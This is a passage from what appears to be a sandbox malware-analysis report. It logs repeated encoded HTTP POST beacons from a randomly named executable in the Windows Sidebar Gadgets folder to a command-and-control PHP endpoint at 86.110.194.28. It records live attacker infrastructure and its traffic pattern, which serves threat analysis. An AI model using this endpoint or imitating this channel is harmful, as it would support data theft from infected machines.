                                                                                                                                                                  Data Raw: 0d 1d 27 04 32 02 25 05 3d 3f 02 00 27 23 35 5a 22 0e 2c 5c 2f 20 32 40 21 12 0b 11 26 15 0a 55 3c 3d 0f 1c 28 0d 04 0d 21 3d 22 0e 28 0a 28 5d 03 10 39 11 3f 3d 23 58 29 2d 39 5c 2d 27 09 5b 30 09 01 00 3e 0d 21 50 31 05 22 54 22 2e 2c 0e 2a 55 3d 13 33 28 3f 02 2a 20 05 12 33 07 20 54 0b 17 24 0f 26 33 23 5f 32 28 2d 5d 29 0e 38 5d 27 04 00 09 22 05 32 14 37 29 27 06 2c 30 29 1f 24 28 3e 0f 3e 00 3f 10 25 39 2a 5d 26 2b 2e 5c 23 0f 28 55 0d 34 57 50
                                                                                                                                                                  Data Ascii: '2%=?'#5Z",\/ 2@!&U<=(!="((]9?=#X)-9\-'[0>!P1"T".,*U=3(?* 3 T$&3#_2(-])8]'"27)',0)$(>>?%9*]&+.\#(U4WP


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  25192.168.2.44976686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:44.553587914 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:44.910571098 CET2576OUTData Raw: 5e 57 5b 5d 5d 5c 50 5d 54 5b 59 5a 5b 50 57 5e 5f 51 5a 59 52 54 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^W[]]\P]T[YZ[PW^_QZYRTPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<-66*8%,@>8"0'&2?)W 4-P (]0*;0+?9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:45.235955000 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:45.370091915 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:45 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  26192.168.2.44976786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:45.573724985 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:45.926117897 CET2576OUTData Raw: 5b 5d 5e 5e 58 5e 55 5a 54 5b 59 5a 5b 56 57 58 5f 50 5a 55 52 54 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^^X^UZT[YZ[VWX_PZURTPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+"\'1, *(!$B>1>5'5 83'',$V?9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:46.276850939 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:46.409938097 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:46 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  27192.168.2.44976886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:46.541990042 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:46.894891977 CET2576OUTData Raw: 5b 56 5e 5c 5d 5c 50 5e 54 5b 59 5a 5b 56 57 5f 5f 57 5a 5d 52 55 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^\]\P^T[YZ[VW__WZ]RUPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&E(="&<0C>;%04&)S5'9W (Z%9 D3/W()#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:47.232325077 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:47.363889933 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:47 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  28192.168.2.44976986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:47.491899014 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:47.848056078 CET2576OUTData Raw: 5e 56 5e 5b 5d 5a 50 50 54 5b 59 5a 5b 56 57 5b 5f 53 5a 5f 52 50 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V^[]ZPPT[YZ[VW[_SZ_RPP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?=*"9,%Z8A>>'"&,!!'=T!8[0<B$?V+9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:48.195022106 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:48.328520060 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:48 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  29192.168.2.44977086.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:48.464046955 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:48.816776037 CET2576OUTData Raw: 5b 5d 5b 5a 58 5a 55 5b 54 5b 59 5a 5b 5e 57 5d 5f 54 5a 5e 52 50 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [][ZXZU[T[YZ[^W]_TZ^RPPG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@?1\6$<'*(*['5\2<> $Q ^?'+'/ W+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:49.140012026 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:49.269925117 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:49 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  30192.168.2.44977186.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:49.399144888 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:49.754292965 CET2576OUTData Raw: 5b 57 5e 58 58 5b 55 5b 54 5b 59 5a 5b 54 57 5b 5f 52 5a 5e 52 57 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [W^XX[U[T[YZ[TW[_RZ^RWP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%+%\"0S2+>3'9[2?5V '=P 8[%)43$T?9#Y'$X.-
                                                                                                                                                                  Jan 3, 2025 09:07:50.080612898 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:50.210144043 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:49 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  31192.168.2.44977286.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:50.297130108 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  32192.168.2.44977386.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:50.403146982 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:50.754406929 CET2576OUTData Raw: 5e 51 5e 5f 58 59 50 58 54 5b 59 5a 5b 5f 57 52 5f 51 5a 5d 52 52 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^Q^_XYPXT[YZ[_WR_QZ]RRPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&)>-]5;28E>]*0'"&/1Q!T48\38@30+9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:51.098463058 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:51.229823112 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:50 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  33192.168.2.44977486.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:51.358062983 CET352OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Jan 3, 2025 09:07:51.707441092 CET2576OUTData Raw: 5b 51 5b 5d 58 5f 50 5a 54 5b 59 5a 5b 52 57 5f 5f 56 5a 58 52 53 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [Q[]X_PZT[YZ[RW__VZXRSP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D+X5Z!0&,<=>Y3=1)5$%!8+$:$$??#Y'$X.5
                                                                                                                                                                  Jan 3, 2025 09:07:52.058923960 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:52.190211058 CET151INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:51 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  34192.168.2.44977686.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:52.317703009 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:52.695858002 CET2576OUTData Raw: 5e 52 5e 5a 5d 5d 50 58 54 5b 59 5a 5b 5f 57 58 5f 56 5a 59 52 5c 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^R^Z]]PXT[YZ[_WX_VZYR\PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(5_6,V1,=>X3$9[%Y:5Q#^/380<<9#Y'$X.
                                                                                                                                                                  Jan 3, 2025 09:07:52.994966030 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:53.122051954 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:52 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  35192.168.2.44977786.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:53.255954981 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:53.613744974 CET2576OUTData Raw: 5b 56 5e 51 5d 5e 50 51 54 5b 59 5a 5b 56 57 58 5f 53 5a 59 52 5d 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [V^Q]^PQT[YZ[VWX_SZYR]PI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A?#:%<#>)'$:2&!=V7<%90<$S)9#Y'$X.%
                                                                                                                                                                  Jan 3, 2025 09:07:53.947146893 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:54.077030897 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:53 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  36192.168.2.44977886.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Jan 3, 2025 09:07:54.211524963 CET376OUTPOST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Jan 3, 2025 09:07:54.566782951 CET2576OUTData Raw: 5b 52 5b 5a 58 57 50 5d 54 5b 59 5a 5b 51 57 5a 5f 54 5a 54 52 51 50 42 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R[ZXWP]T[YZ[QWZ_TZTRQPB_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<>5\'20*+Y0'&'?%S!%P 8?$9$<#+)#Y'$X.9
                                                                                                                                                                  Jan 3, 2025 09:07:54.897229910 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:07:55.030688047 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:07:54 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  37192.168.2.44977986.110.194.28807744C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
